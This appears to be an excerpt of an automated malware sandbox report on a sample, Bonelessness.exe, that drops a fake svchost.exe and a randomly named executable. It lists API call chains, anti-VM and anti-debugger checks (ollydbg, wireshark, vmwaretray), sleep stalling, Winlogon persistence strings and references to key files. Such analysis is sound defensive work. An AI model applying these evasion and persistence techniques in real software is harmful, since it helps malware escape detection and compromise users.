      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,8_2_013027C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,8_2_012E1660
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00403870 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403870
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00403870 RegQueryValueEx -> SystemBiosVersion/Date1_2_00403870
      Source: C:\Windows\apppatch\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-65285
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
      Source: C:\Users\user\Desktop\Bonelessness.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-21033
      Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_1-65364
      Source: C:\Users\user\Desktop\Bonelessness.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-21066
      Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_1-64871
      Source: JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: IDAG.EXE
      Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: NOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLSYSTEMDRIVESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON%XSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNUSERINIT\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\DRIVERS\NTFS.SYSNTDLL.DLLRTLUNIFORMKERNEL32.DLLISWOW64PROCESSKERNEL.DLLA
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: NAME.KEY\SECRETS.KEYSIGN.KEYJAVA.EXEKERNEL32.DLLCREATEFILEW\EXPLORER.EXEGETFILEATTRIBUTESWUSER32.DLLGETWINDOWTEXTAOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: VNAME.KEY\SECRETS.KEYSIGN.KEYJAVA.EXEKERNEL32.DLLCREATEFILEW\EXPLORER.EXEGETFILEATTRIBUTESWUSER32.DLLGETWINDOWTEXTAOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
      Source: JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
      Source: JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00401DE0 rdtsc 0_2_00401DE0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D37300 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification,1_2_02D37300
      Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 4279Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 5581Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeEvaded block: after key decisiongraph_1-65032
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeEvaded block: after key decision
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeEvaded block: after key decision
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeEvaded block: after key decision
      Source: C:\Users\user\Desktop\Bonelessness.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-21176
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D37430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,1_2_02D37430
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028A7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_028A7430
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02457430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_02457430
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012F7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,8_2_012F7430
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Windows\apppatch\svchost.exeAPI coverage: 6.8 %
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeAPI coverage: 2.5 %
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeAPI coverage: 2.5 %
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeAPI coverage: 2.5 %
      Source: C:\Windows\apppatch\svchost.exe TID: 3748Thread sleep count: 4279 > 30Jump to behavior
      Source: C:\Windows\apppatch\svchost.exe TID: 3748Thread sleep time: -427900s >= -30000sJump to behavior
      Source: C:\Windows\apppatch\svchost.exe TID: 3748Thread sleep count: 5581 > 30Jump to behavior
      Source: C:\Windows\apppatch\svchost.exe TID: 3748Thread sleep time: -558100s >= -30000sJump to behavior
      Source: C:\Windows\apppatch\svchost.exe TID: 6744Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D3E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02D3E1B0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D4D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,1_2_02D4D638
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D49460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,1_2_02D49460
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D3CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02D3CC10
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D27400 PathFileExistsA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_02D27400
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D4D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,1_2_02D4D5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028AE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_028AE1B0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028BD638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_028BD638
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_02897400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_02897400
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028ACC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_028ACC10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028B9460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_028B9460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028BD5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_028BD5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0245E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0245E1B0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0246D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0246D638
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02469460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_02469460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02447400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_02447400
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0245CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0245CC10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0246D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0246D5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_00E16B1C FindFirstFileExW,8_2_00E16B1C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012FE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_012FE1B0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0130D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_0130D5A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012E7400 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_012E7400
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012FCC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_012FCC10
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01309460 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_01309460
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0130D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_0130D638
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D3D060 StrStrIA,memset,memset,SetErrorMode,SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,PathAddBackslashA,SetErrorMode,1_2_02D3D060
      Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: vname.key\secrets.keysign.keyjava.exekernel32.dllCreateFileW\explorer.exeGetFileAttributesWuser32.dllGetWindowTextAOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
      Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: NOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllSystemDrivesoftware\microsoft\windows nt\currentversion\winlogon%xsoftware\microsoft\windows\currentversion\runuserinit\\?\globalroot\systemroot\system32\drivers\ntfs.sysntdll.dllRtlUniformkernel32.dllIsWow64Processkernel.dlla
      Source: svchost.exe, 00000001.00000002.2910453874.0000000000863000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCP Service Provider
      Source: svchost.exe, 00000001.00000002.2910453874.0000000000850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: name.key\secrets.keysign.keyjava.exekernel32.dllCreateFileW\explorer.exeGetFileAttributesWuser32.dllGetWindowTextAOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
      Source: C:\Users\user\Desktop\Bonelessness.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Windows\apppatch\svchost.exeOpen window title or class name: ollydbg
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPortJump to behavior
